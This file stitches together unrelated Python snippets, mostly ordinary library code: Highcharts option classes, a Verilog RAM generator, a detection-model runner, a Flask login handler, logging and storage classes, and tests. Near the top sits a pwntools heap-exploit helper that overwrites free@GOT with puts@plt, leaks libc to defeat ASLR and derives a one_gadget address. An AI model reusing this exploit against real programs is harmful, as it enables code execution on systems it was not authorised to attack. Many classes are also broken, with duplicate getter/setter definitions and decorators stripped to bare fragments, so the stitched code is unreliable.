    level = 'DEBUG' if verbose else 'INFO'
    use_color = format_ != 'no-color'
    logger.add(sys.stderr, level=level, colorize=use_color, format='<level>{message}</level>')
def leak():
    """Leak the libc base address and derive the one_gadget address.

    pwntools exploit helper: corrupts chunk pointers so that free() resolves
    to puts(), then prints a GOT entry to defeat ASLR.  Stores the result in
    the module-global ``one_gadget``.
    """
    global one_gadget
    # Fake layout: point the first slot at free's GOT entry so renew(2, ...)
    # writes through it.
    payload = ('A' * 8)
    payload += p64(elf.got['free'])
    payload += ('A' * 8)
    payload += p64(big_ptr)
    payload += p32(1)
    renew(1, payload)
    # Overwrite free@got with puts@plt: subsequent free(p) becomes puts(p).
    renew(2, p64(elf.plt['puts']))
    # Point slot 1 at puts' GOT entry, then "free" it to print the address.
    renew(1, p64(elf.got['puts']))
    wipe(2)
    # Leak is 6 little-endian bytes; pad to 8 for u64.
    puts_addr = u64((io.recvline()[:6] + '\x00\x00'))
    libc_base = (puts_addr - libc.symbols['puts'])
    # 283158 is the one_gadget offset for this specific libc build —
    # must be recomputed for any other libc.
    one_gadget = (libc_base + 283158)
    log.info(('libc base: 0x%x' % libc_base))
    log.info(('one_gadget address: 0x%x' % one_gadget))
class OptionSeriesPieAccessibilityPoint(Options):
    """Highcharts `series.pie.accessibility.point` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def dateFormat(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def dateFormat(self, text: str):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(text, js_type=False)

    def dateFormatter(self):
        return self._config_get(None)

    def dateFormatter(self, value: Any):
        self._config(value, js_type=False)

    def describeNull(self):
        # Defaults to True: null points are still described to screen readers.
        return self._config_get(True)

    def describeNull(self, flag: bool):
        self._config(flag, js_type=False)

    def descriptionFormat(self):
        return self._config_get(None)

    def descriptionFormat(self, text: str):
        self._config(text, js_type=False)

    def descriptionFormatter(self):
        return self._config_get(None)

    def descriptionFormatter(self, value: Any):
        self._config(value, js_type=False)

    def valueDecimals(self):
        return self._config_get(None)

    def valueDecimals(self, num: float):
        self._config(num, js_type=False)

    def valueDescriptionFormat(self):
        # Highcharts default announcement template.
        return self._config_get('{xDescription}{separator}{value}.')

    def valueDescriptionFormat(self, text: str):
        self._config(text, js_type=False)

    def valuePrefix(self):
        return self._config_get(None)

    def valuePrefix(self, text: str):
        self._config(text, js_type=False)

    def valueSuffix(self):
        return self._config_get(None)

    def valueSuffix(self, text: str):
        self._config(text, js_type=False)
def sdp_bram(name, width, address_bits):
    """Return Verilog source for a simple dual-port (1 write / 1 read) block RAM.

    Args:
        name: emitted module name.
        width: data width in bits of both ports.
        address_bits: address bus width; the RAM stores 2**address_bits words.

    Returns:
        str: complete Verilog module text.

    Fixes over the previous revision:
      * both ``always`` blocks were missing the ``@`` event-control token
        (``always (posedge ...)`` does not parse as Verilog);
      * the memory was declared ``ram[0:depth]`` with ``depth = 2**address_bits``,
        i.e. one word too many — the valid index range for an
        ``address_bits``-wide address is 0 .. 2**address_bits - 1.
    """
    last_index = (2 ** address_bits) - 1
    return '''
module {name}(
    // Write port
    input wrclk,
    input [{width}-1:0] di,
    input wren,
    input [{address_bits}-1:0] wraddr,
    // Read port
    input rdclk,
    input rden,
    input [{address_bits}-1:0] rdaddr,
    output reg [{width}-1:0] do);

    (* ram_style = "block" *) reg [{width}-1:0] ram[0:{last_index}];

    always @(posedge wrclk) begin
        if(wren == 1) begin
            ram[wraddr] <= di;
        end
    end

    always @(posedge rdclk) begin
        if(rden == 1) begin
            do <= ram[rdaddr];
        end
    end

endmodule
'''.format(name=name, width=width, address_bits=address_bits, last_index=last_index)
class OptionPlotoptionsWordcloudSonificationDefaultinstrumentoptionsActivewhen(Options):
    """Highcharts `plotOptions.wordcloud.sonification.defaultInstrumentOptions.activeWhen` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def crossingDown(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def crossingDown(self, num: float):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(num, js_type=False)

    def crossingUp(self):
        return self._config_get(None)

    def crossingUp(self, num: float):
        self._config(num, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def prop(self):
        return self._config_get(None)

    def prop(self, text: str):
        self._config(text, js_type=False)
class BaseRunner(object):
    """Base class for D2Go runners: model building, train/test hooks, and an
    optional gloo CPU control process group for control-plane collectives.

    NOTE(review): several methods take ``cls`` as first argument
    (create_shared_context, get_default_cfg, build_detection_*_loader) —
    their @classmethod decorators appear to have been stripped during
    extraction.
    """

    def __init__(self):
        # Log class usage for internal API-usage telemetry.
        identifier = f'D2Go.Runner.{self.__class__.__name__}'
        torch._C._log_api_usage_once(identifier)
        logger.info('Initializing control pg')
        # CPU-side (gloo) group, created only when torch.distributed is
        # already initialized; otherwise left as None.
        self._control_pg: Optional[dist.ProcessGroup] = None
        if dist.is_initialized():
            logger.info('Create gloo CPU control pg')
            self._control_pg = dist.new_group(backend=dist.Backend.GLOO, timeout=CONTROL_PG_TIMEOUT)

    def _initialize(self, cfg):
        """One-time registration; idempotent — repeated calls only warn."""
        if getattr(self, '_has_initialized', False):
            logger.warning('Runner has already been initialized, skip initialization.')
            return
        self._has_initialized = True
        self.register(cfg)

    def register(self, cfg):
        """Hook for subclasses to register datasets/components; default no-op."""
        pass

    def cleanup(self) -> None:
        """Hook for releasing resources at shutdown; default no-op."""
        pass

    def create_shared_context(cls, cfg) -> D2GoSharedContext:
        # Default no-op (returns None despite the annotation); subclasses override.
        pass

    def get_default_cfg(cls):
        """Return the default config node for this runner."""
        return get_base_runner_default_cfg(CfgNode())

    def build_model(self, cfg, eval_only=False) -> nn.Module:
        """Build the D2Go model; with eval_only, also load weights and switch to eval mode."""
        model = build_d2go_model(cfg.clone()).model
        if eval_only:
            checkpointer = DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR)
            checkpointer.load(cfg.MODEL.WEIGHTS)
            model.eval()
        return model

    def do_test(self, *args, **kwargs):
        """Subclasses must implement evaluation."""
        raise NotImplementedError()

    def do_train(self, *args, **kwargs):
        """Subclasses must implement training."""
        raise NotImplementedError()

    def build_detection_test_loader(cls, *args, **kwargs):
        # Thin pass-through to detectron2's test loader builder.
        return d2_build_detection_test_loader(*args, **kwargs)

    def build_detection_train_loader(cls, *args, **kwargs):
        # Thin pass-through to detectron2's train loader builder.
        return d2_build_detection_train_loader(*args, **kwargs)
def balance_outward(view, syntax_name):
    """For each selection, return the first enclosing region that extends past it.

    Falls back to the selection itself when no outward region both contains
    the selection and ends after it.
    """
    balanced = []
    for selection in view.sel():
        candidates = get_regions(view, selection.begin(), syntax_name, 'outward')
        grown = next(
            (region for region in candidates
             if region.contains(selection) and region.end() > selection.end()),
            selection,
        )
        balanced.append(grown)
    return balanced
def test_pyproject_poetry_parser():
    """TomlParser extracts runtime then dev dependency names from a poetry pyproject."""
    content = '\n [build-system]\n requires = ["poetry-core"]\n build-backend = "poetry.core.masonry.api"\n\n [tool.poetry.dependencies]\n python = "^3.8.1"\n click = "^8.1.7"\n\n [tool.poetry.dev-dependencies]\n black = "*"\n flake8 = "*"\n isort = "*"\n pytest = "*"\n pytest-cov = "*"\n pre-commit = "*"\n '
    runtime_deps = ['python', 'click']
    dev_deps = ['black', 'flake8', 'isort', 'pytest', 'pytest-cov', 'pre-commit']
    assert TomlParser().parse(content) == runtime_deps + dev_deps
class OptionSeriesSolidgaugeSonificationTracksMappingGapbetweennotes(Options):
    """Highcharts `series.solidgauge.sonification.tracks.mapping.gapBetweenNotes` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def mapFunction(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class OptionSeriesAreaSonificationTracksActivewhen(Options):
    """Highcharts `series.area.sonification.tracks.activeWhen` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def crossingDown(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def crossingDown(self, num: float):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(num, js_type=False)

    def crossingUp(self):
        return self._config_get(None)

    def crossingUp(self, num: float):
        self._config(num, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def prop(self):
        return self._config_get(None)

    def prop(self, text: str):
        self._config(text, js_type=False)
class TestSuperFencesCustomValidatorBroken(util.MdCase):
    """When a custom fence's validator raises, superfences must fall back to
    rendering the content as a plain highlighted code block."""

    extension = ['pymdownx.superfences']
    # custom_validator_exploder raises during validation — this exercises the
    # graceful-fallback path of the custom fence machinery.
    extension_configs = {'pymdownx.superfences': {'custom_fences': [{'name': 'test', 'class': 'test', 'format': custom_format, 'validator': custom_validator_exploder}]}}

    def test_broken(self):
        """Bare `test` language: exploding validator falls back to default rendering."""
        self.check_markdown("\n ```test\n doesn't matter\n ```\n ", '\n <div class="highlight"><pre><span></span><code>doesn&#39;t matter\n </code></pre></div>\n ', True)

    def test_broken_brace(self):
        """Brace form `{.test}`: same fallback behavior."""
        self.check_markdown("\n ```{.test}\n doesn't matter\n ```\n ", '\n <div class="highlight"><pre><span></span><code>doesn&#39;t matter\n </code></pre></div>\n ', True)
def authenticate(allow_refresh_token=False, existing_identity=None):
    """Authenticate the JSON credentials in the current request and mint a JWT.

    Args:
        allow_refresh_token: when True and the client sent 'remember-me',
            a refresh token is also issued (cookie or response body).
        existing_identity: if given, the authenticated user must equal it
            (re-authentication flows).

    Returns:
        A Flask JSON response carrying the access token, or an
        (error-json, status) tuple on failure.
    """
    data = request.get_json()
    # Accept either 'email' or 'username' as the login field.
    username = data.get('email', data.get('username'))
    password = data.get('password')
    criterion = [username, password]
    if (not all(criterion)):
        logging.error('username or password missing')
        return (jsonify(error='username or password missing'), 400)
    identity = jwt_authenticate(username, password)
    # Reject bad credentials, or a valid login that doesn't match the
    # expected identity when re-authenticating.
    if ((not identity) or (existing_identity and (identity != existing_identity))):
        logging.error('Invalid Credentials')
        return (jsonify(error='Invalid Credentials'), 401)
    if identity.is_blocked:
        logging.info('Admin has marked this account as spam')
        return (jsonify(error='Admin has marked this account as spam'), 401)
    remember_me = data.get('remember-me')
    include_in_response = data.get('include-in-response')
    add_refresh_token = (allow_refresh_token and remember_me)
    # With a refresh token the access token is capped at 90 minutes;
    # otherwise the JWT library's default expiry applies.
    expiry_time = (timedelta(minutes=90) if add_refresh_token else None)
    access_token = create_access_token(identity.id, fresh=True, expires_delta=expiry_time)
    response_data = {'access_token': access_token}
    if add_refresh_token:
        refresh_token = create_refresh_token(identity.id)
        if include_in_response:
            response_data['refresh_token'] = refresh_token
    response = jsonify(response_data)
    # Clients that didn't ask for the token in the body get it as a cookie.
    if (add_refresh_token and (not include_in_response)):
        set_refresh_cookies(response, refresh_token)
    return response
def possible_subdirs(app: metadata.App):
    """Yield build subdirectories of *app* whose manifest resolves to a package id."""
    if app.RepoType == 'srclib':
        build_dir = Path('build/srclib') / app.Repo
    else:
        build_dir = Path('build') / app.id
    last_build = get_last_build_from_app(app)
    for candidate in dirs_with_manifest(build_dir):
        manifest_files = common.manifest_paths(candidate, last_build.gradle)
        package_id = common.parse_androidmanifests(manifest_files, app)[2]
        if package_id is None:
            continue
        subdir = candidate.relative_to(build_dir)
        logging.debug(('Adding possible subdir %s' % subdir))
        yield subdir
class FluentHandler(logging.Handler):
    """logging.Handler that forwards records to a Fluentd daemon via FluentSender.

    NOTE(review): ``sender`` is accessed as an attribute below
    (``self.sender.close()``, ``_sender = self.sender``) — its @property
    decorator appears to have been stripped during extraction.
    """

    def __init__(self, tag, host='localhost', port=24224, timeout=3.0, verbose=False, buffer_overflow_handler=None, msgpack_kwargs=None, nanosecond_precision=False, **kwargs):
        # Only record the settings here; the sender is built lazily on first use.
        self.tag = tag
        self._host = host
        self._port = port
        self._timeout = timeout
        self._verbose = verbose
        self._buffer_overflow_handler = buffer_overflow_handler
        self._msgpack_kwargs = msgpack_kwargs
        self._nanosecond_precision = nanosecond_precision
        self._kwargs = kwargs
        self._sender = None
        logging.Handler.__init__(self)

    def getSenderClass(self):
        """Extension point: subclasses may supply a different sender class."""
        return sender.FluentSender

    def sender(self):
        """Lazily create and cache the FluentSender instance."""
        if (self._sender is None):
            self._sender = self.getSenderInstance(tag=self.tag, host=self._host, port=self._port, timeout=self._timeout, verbose=self._verbose, buffer_overflow_handler=self._buffer_overflow_handler, msgpack_kwargs=self._msgpack_kwargs, nanosecond_precision=self._nanosecond_precision, **self._kwargs)
        return self._sender

    def getSenderInstance(self, tag, host, port, timeout, verbose, buffer_overflow_handler, msgpack_kwargs, nanosecond_precision, **kwargs):
        """Instantiate the sender class with the given connection settings."""
        sender_class = self.getSenderClass()
        return sender_class(tag, host=host, port=port, timeout=timeout, verbose=verbose, buffer_overflow_handler=buffer_overflow_handler, msgpack_kwargs=msgpack_kwargs, nanosecond_precision=nanosecond_precision, **kwargs)

    def emit(self, record):
        """Format the record and emit it with second- or nanosecond-precision time."""
        data = self.format(record)
        _sender = self.sender
        return _sender.emit_with_time(None, (sender.EventTime(record.created) if _sender.nanosecond_precision else int(record.created)), data)

    def close(self):
        """Close the underlying sender, then the Handler, under the handler lock."""
        self.acquire()
        try:
            try:
                self.sender.close()
            finally:
                super(FluentHandler, self).close()
        finally:
            self.release()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Context-manager support: guarantees the sender is closed on exit.
        self.close()
class StorageAPI(BaseAPI):
    """Persists integration configuration (monitored interfaces/devices,
    polling intervals, logging flags) in Home Assistant Store JSON files.

    NOTE(review): ``_storage_config`` and the zero-argument accessors are read
    as attributes elsewhere (``self._storage_config.async_load()``) — their
    @property decorators appear to have been stripped.  ``self.data`` is used
    although only ``_data`` is assigned in __init__; a ``data`` property
    presumably exists on the base class or was stripped — TODO confirm.
    """

    # Store objects keyed by storage file identifier; None until initialize().
    _stores: (dict[(str, Store)] | None)
    _config_data: (ConfigData | None)
    _data: dict

    def __init__(self, hass: (HomeAssistant | None), async_on_data_changed: (Callable[([], Awaitable[None])] | None)=None, async_on_status_changed: (Callable[([ConnectivityStatus], Awaitable[None])] | None)=None):
        super().__init__(hass, async_on_data_changed, async_on_status_changed)
        self._config_data = None
        self._stores = None
        self._data = {}

    def _storage_config(self) -> Store:
        """Return the Store backing the configuration file."""
        storage = self._stores.get(STORAGE_DATA_FILE_CONFIG)
        return storage

    def monitored_interfaces(self):
        """Mapping of interface name -> enabled flag."""
        result = self.data.get(STORAGE_DATA_MONITORED_INTERFACES, {})
        return result

    def monitored_devices(self):
        """Mapping of device name -> enabled flag."""
        result = self.data.get(STORAGE_DATA_MONITORED_DEVICES, {})
        return result

    def log_incoming_messages(self):
        """Whether raw incoming messages should be logged (default False)."""
        result = self.data.get(STORAGE_DATA_LOG_INCOMING_MESSAGES, False)
        return result

    def consider_away_interval(self):
        """Seconds of silence before a device is considered away."""
        result = self.data.get(STORAGE_DATA_CONSIDER_AWAY_INTERVAL, DEFAULT_CONSIDER_AWAY_INTERVAL.total_seconds())
        return result

    def update_entities_interval(self):
        """Seconds between entity refreshes."""
        result = self.data.get(STORAGE_DATA_UPDATE_ENTITIES_INTERVAL, DEFAULT_UPDATE_ENTITIES_INTERVAL.total_seconds())
        return result

    def update_api_interval(self):
        """Seconds between API polls."""
        result = self.data.get(STORAGE_DATA_UPDATE_API_INTERVAL, DEFAULT_UPDATE_API_INTERVAL.total_seconds())
        return result

    async def initialize(self, config_data: ConfigData):
        """Create the per-entry Store files and load (or seed) the configuration."""
        self._config_data = config_data
        self._initialize_storages()
        (await self._async_load_configuration())

    def _initialize_storages(self):
        # One JSON Store per storage file, namespaced by domain and entry id.
        stores = {}
        entry_id = self._config_data.entry.entry_id
        for storage_data_file in STORAGE_DATA_FILES:
            file_name = f'{DOMAIN}.{entry_id}.{storage_data_file}.json'
            stores[storage_data_file] = Store(self.hass, STORAGE_VERSION, file_name, encoder=JSONEncoder)
        self._stores = stores

    async def _async_load_configuration(self):
        """Load persisted config; on first run, write the defaults back to disk."""
        self.data = (await self._storage_config.async_load())
        if (self.data is None):
            self.data = {STORAGE_DATA_MONITORED_INTERFACES: {}, STORAGE_DATA_MONITORED_DEVICES: {}, STORAGE_DATA_LOG_INCOMING_MESSAGES: False, STORAGE_DATA_CONSIDER_AWAY_INTERVAL: DEFAULT_CONSIDER_AWAY_INTERVAL.total_seconds(), STORAGE_DATA_UPDATE_ENTITIES_INTERVAL: DEFAULT_UPDATE_ENTITIES_INTERVAL.total_seconds(), STORAGE_DATA_UPDATE_API_INTERVAL: DEFAULT_UPDATE_API_INTERVAL.total_seconds()}
            (await self._async_save())
        _LOGGER.debug(f'Loaded configuration data: {self.data}')
        (await self.set_status(ConnectivityStatus.Connected))
        (await self.fire_data_changed_event())

    async def _async_save(self):
        """Persist the current data and notify listeners."""
        _LOGGER.info(f'Save configuration, Data: {self.data}')
        (await self._storage_config.async_save(self.data))
        (await self.fire_data_changed_event())

    async def set_monitored_interface(self, interface_name: str, is_enabled: bool):
        _LOGGER.debug(f'Set monitored interface {interface_name} to {is_enabled}')
        self.data[STORAGE_DATA_MONITORED_INTERFACES][interface_name] = is_enabled
        (await self._async_save())

    async def set_monitored_device(self, device_name: str, is_enabled: bool):
        # NOTE(review): log message says "interface" but this toggles a device —
        # runtime string left unchanged here; consider fixing upstream.
        _LOGGER.debug(f'Set monitored interface {device_name} to {is_enabled}')
        self.data[STORAGE_DATA_MONITORED_DEVICES][device_name] = is_enabled
        (await self._async_save())

    async def set_log_incoming_messages(self, enabled: bool):
        _LOGGER.debug(f'Set log incoming messages to {enabled}')
        self.data[STORAGE_DATA_LOG_INCOMING_MESSAGES] = enabled
        (await self._async_save())

    async def set_consider_away_interval(self, interval: int):
        _LOGGER.debug(f'Changing {STORAGE_DATA_CONSIDER_AWAY_INTERVAL}: {interval}')
        self.data[STORAGE_DATA_CONSIDER_AWAY_INTERVAL] = interval
        (await self._async_save())

    async def set_update_entities_interval(self, interval: int):
        _LOGGER.debug(f'Changing {STORAGE_DATA_UPDATE_ENTITIES_INTERVAL}: {interval}')
        self.data[STORAGE_DATA_UPDATE_ENTITIES_INTERVAL] = interval
        (await self._async_save())

    async def set_update_api_interval(self, interval: int):
        _LOGGER.debug(f'Changing {STORAGE_DATA_UPDATE_API_INTERVAL}: {interval}')
        self.data[STORAGE_DATA_UPDATE_API_INTERVAL] = interval
        (await self._async_save())
class Field(Html.Html):
    """Composite HTML component: optional label + input + optional icon + helper text.

    NOTE(review): ``dom`` caches ``self._dom`` and is written in accessor
    style — a stripped @property decorator is likely; confirm against the
    original source.
    """
    name = 'Field'

    def __init__(self, page: primitives.PageModel, html_input, label, icon, width, height, html_code, helper, options, profile):
        super(Field, self).__init__(page, '', html_code=html_code, profile=profile, css_attrs={'width': width, 'height': height})
        self._vals = ''
        # Label placed before/after the input depending on options['position'].
        self.add_label(label, html_code=self.htmlCode, css={'height': 'auto', 'margin-top': '1px', 'margin-bottom': '1px'}, position=options.get('position', 'before'), options=options)
        if (self.label and (options.get('format') == 'column')):
            # Column layout: stack the label above the input as a block element.
            self.label.style.css.float = None
            self.label.style.css.display = 'block'
            self.label.style.css.color = self.page.theme.notch()
            self.label.style.css.bold()
            html_input.style.css.width = 'auto'
        self.add_helper(helper, css={'line-height': ('%spx' % Defaults.LINE_HEIGHT)})
        self.input = html_input
        if (html_code is not None):
            # Mirror the component code into the form 'name' attr when unset.
            if ('name' not in self.input.attr):
                self.input.attr['name'] = self.input.htmlCode
        self.append_child(self.input)
        self.add_icon(icon, html_code=self.htmlCode, position='after', family=options.get('icon_family'), css={'margin-left': '5px', 'color': self.page.theme.colors[(- 1)]})
        self.css({'margin-top': '5px'})

    def dom(self) -> JsHtmlField.JsHtmlFields:
        """Lazily build and cache the JS DOM wrapper for this field."""
        if (self._dom is None):
            self._dom = JsHtmlField.JsHtmlFields(self, page=self.page)
        return self._dom

    def __str__(self):
        # Render children (label/input/icon) then append the helper markup.
        str_div = ''.join([(v.html() if hasattr(v, 'html') else v) for v in self.val])
        return ('<div %s>%s%s</div>' % (self.get_attrs(css_class_names=self.style.get_classes()), str_div, self.helper))
class OptionPlotoptionsNetworkgraphSonificationDefaultinstrumentoptionsActivewhen(Options):
    """Highcharts `plotOptions.networkgraph.sonification.defaultInstrumentOptions.activeWhen` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def crossingDown(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def crossingDown(self, num: float):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(num, js_type=False)

    def crossingUp(self):
        return self._config_get(None)

    def crossingUp(self, num: float):
        self._config(num, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def prop(self):
        return self._config_get(None)

    def prop(self, text: str):
        self._config(text, js_type=False)
# NOTE(review): the bare `.usefixtures('use_tmpdir')` below is the tail of a
# stripped decorator (presumably `@pytest.mark.usefixtures('use_tmpdir')`);
# restore the full decorator when merging.
.usefixtures('use_tmpdir')
def test_not_executable_job_script_fails_gracefully():
    """A JOB_SCRIPT pointing at a non-executable file must raise ConfigValidationError."""
    config_file_name = 'config.ert'
    script_name = 'not-executable-script.py'
    # touch() creates the script without the executable bit set.
    touch(script_name)
    config_file_contents = dedent(f'''NUM_REALIZATIONS 1
JOB_SCRIPT {script_name}
''')
    with open(config_file_name, mode='w', encoding='utf-8') as fh:
        fh.write(config_file_contents)
    # The parser must reject the config with a message naming the script.
    with pytest.raises(ConfigValidationError, match=f'not executable.*{script_name}'):
        _ = lark_parse(config_file_name, schema=init_user_config_schema())
def main():
    """Ansible module entry point for `fortios_firewall_schedule_recurring`.

    Builds the argument spec from the versioned schema, opens the FortiOS
    connection over the Ansible socket, applies the requested present/absent
    state and exits with changed/diff information.
    """
    module_spec = schema_to_module_spec(versioned_schema)
    mkeyname = 'name'
    # Base module arguments shared by all fortios_* modules.
    fields = {'access_token': {'required': False, 'type': 'str', 'no_log': True}, 'enable_log': {'required': False, 'type': 'bool', 'default': False}, 'vdom': {'required': False, 'type': 'str', 'default': 'root'}, 'member_path': {'required': False, 'type': 'str'}, 'member_state': {'type': 'str', 'required': False, 'choices': ['present', 'absent']}, 'state': {'required': True, 'type': 'str', 'choices': ['present', 'absent']}, 'firewall_schedule_recurring': {'required': False, 'type': 'dict', 'default': None, 'options': {}}}
    # Copy the schema-derived options in; the mkey ('name') becomes required.
    for attribute_name in module_spec['options']:
        fields['firewall_schedule_recurring']['options'][attribute_name] = module_spec['options'][attribute_name]
        if (mkeyname and (mkeyname == attribute_name)):
            fields['firewall_schedule_recurring']['options'][attribute_name]['required'] = True
    module = AnsibleModule(argument_spec=fields, supports_check_mode=True)
    check_legacy_fortiosapi(module)
    is_error = False
    has_changed = False
    result = None
    diff = None
    versions_check_result = None
    if module._socket_path:
        connection = Connection(module._socket_path)
        if ('access_token' in module.params):
            connection.set_option('access_token', module.params['access_token'])
        if ('enable_log' in module.params):
            connection.set_option('enable_log', module.params['enable_log'])
        else:
            connection.set_option('enable_log', False)
        fos = FortiOSHandler(connection, module, mkeyname)
        # Warn (don't fail) when the playbook schema doesn't match the device.
        versions_check_result = check_schema_versioning(fos, versioned_schema, 'firewall_schedule_recurring')
        (is_error, has_changed, result, diff) = fortios_firewall_schedule(module.params, fos, module.check_mode)
    else:
        # No httpapi connection available — cannot proceed.
        module.fail_json(**FAIL_SOCKET_MSG)
    if (versions_check_result and (versions_check_result['matched'] is False)):
        module.warn('Ansible has detected version mismatch between FortOS system and your playbook, see more details by specifying option -vvv')
    if (not is_error):
        if (versions_check_result and (versions_check_result['matched'] is False)):
            module.exit_json(changed=has_changed, version_check_warning=versions_check_result, meta=result, diff=diff)
        else:
            module.exit_json(changed=has_changed, meta=result, diff=diff)
    elif (versions_check_result and (versions_check_result['matched'] is False)):
        module.fail_json(msg='Error in repo', version_check_warning=versions_check_result, meta=result)
    else:
        module.fail_json(msg='Error in repo', meta=result)
# NOTE(review): the bare `(name=st.text(), input_file=st.text())` below is the
# argument list of a stripped decorator (presumably hypothesis
# `@given(name=st.text(), input_file=st.text())`); restore it when merging.
(name=st.text(), input_file=st.text())
def test_serialize_deserialize_gen_data_responses(shared_storage, name, input_file):
    """GEN_DATA response configs survive a storage write/read round trip."""
    responses = [GenDataConfig(name=name, input_file=input_file)]
    with open_storage(shared_storage, 'w') as storage:
        experiment = storage.create_experiment(responses=responses)
        storage.create_ensemble(experiment, ensemble_size=5)
    # Re-open read-only and compare the deserialized configs to the originals.
    with open_storage(shared_storage) as storage:
        assert (list(storage.get_experiment(experiment.id).response_configuration.values()) == responses)
class OptionSeriesSankeyOnpointPosition(Options):
    """Highcharts `series.sankey.onPoint.position` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def offsetX(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def offsetX(self, num: float):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(num, js_type=False)

    def offsetY(self):
        return self._config_get(None)

    def offsetY(self, num: float):
        self._config(num, js_type=False)

    def x(self):
        return self._config_get(None)

    def x(self, num: float):
        self._config(num, js_type=False)

    def y(self):
        return self._config_get(None)

    def y(self, num: float):
        self._config(num, js_type=False)
class OptionPlotoptionsPyramidSonificationTracksMappingGapbetweennotes(Options):
    """Highcharts `plotOptions.pyramid.sonification.tracks.mapping.gapBetweenNotes` options.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name — the @property/@<name>.setter decorators appear to have been
    stripped during extraction; as written, the second def overrides the first.
    """

    def mapFunction(self):
        # Getter: no default until configured.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: js_type=False — stored as data, not emitted as raw JS.
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
def edit_notes(note):
    """Open *note* in the user's configured editor and return the edited text.

    Prefers a configured GUI editor; otherwise launches the configured (or
    default) terminal editor inside a terminal emulator via `term -e editor`.
    The note round-trips through a temp file.  Returns the original note
    unchanged if the terminal/editor cannot be launched.
    """
    if keepmenu.CONF.has_option('database', 'gui_editor'):
        editor = keepmenu.CONF.get('database', 'gui_editor')
        editor = shlex.split(editor)
    else:
        if keepmenu.CONF.has_option('database', 'editor'):
            editor = keepmenu.CONF.get('database', 'editor')
        else:
            editor = os.environ.get('EDITOR', 'vim')
        if keepmenu.CONF.has_option('database', 'terminal'):
            terminal = keepmenu.CONF.get('database', 'terminal')
        else:
            terminal = 'xterm'
        terminal = shlex.split(terminal)
        editor = shlex.split(editor)
        # Terminal editors are wrapped: <terminal...> -e <editor...>
        editor = ((terminal + ['-e']) + editor)
    # Work with bytes so the temp file carries the configured encoding.
    note = (b'' if (note is None) else note.encode(keepmenu.ENC))
    with tempfile.NamedTemporaryFile(suffix='.tmp') as fname:
        fname.write(note)
        fname.flush()
        editor.append(fname.name)
        try:
            # Blocks until the editor process exits.
            call(editor)
        except FileNotFoundError:
            # Launch failed — report and hand back the original text.
            dmenu_err('Terminal not found. Please update config.ini.')
            note = ('' if (not note) else note.decode(keepmenu.ENC))
            return note
        # Re-read whatever the editor wrote to the temp file.
        fname.seek(0)
        note = fname.read()
        note = ('' if (not note) else note.decode(keepmenu.ENC))
        return note.strip()
def main():
    """Wire up a backtrader Cerebro with the Kiwoom OpenAPI+ store and run the strategy."""
    logging.info('Creating Cerebro')
    cerebro = bt.Cerebro()
    logging.info('Initializing Kiwoom Store')
    kiwoomstore = KiwoomOpenApiPlusStore()
    logging.info('Getting data')
    # Backfilled history for symbol 005930 (Samsung Electronics).
    historial_data = kiwoomstore.getdata(dataname='005930', historical=True)
    # NOTE(review): realtime_data is built but never passed to cerebro.adddata
    # below — looks like an oversight or intentionally disabled; confirm.
    realtime_data = kiwoomstore.getdata(dataname='005930', backfill_start=False, timeframe=bt.TimeFrame.Ticks, compression=1)
    logging.info('Adding data')
    cerebro.adddata(historial_data)
    logging.info('Configuring others')
    cerebro.addsizer(bt.sizers.FixedSize, stake=10)
    cerebro.addtz('Asia/Seoul')
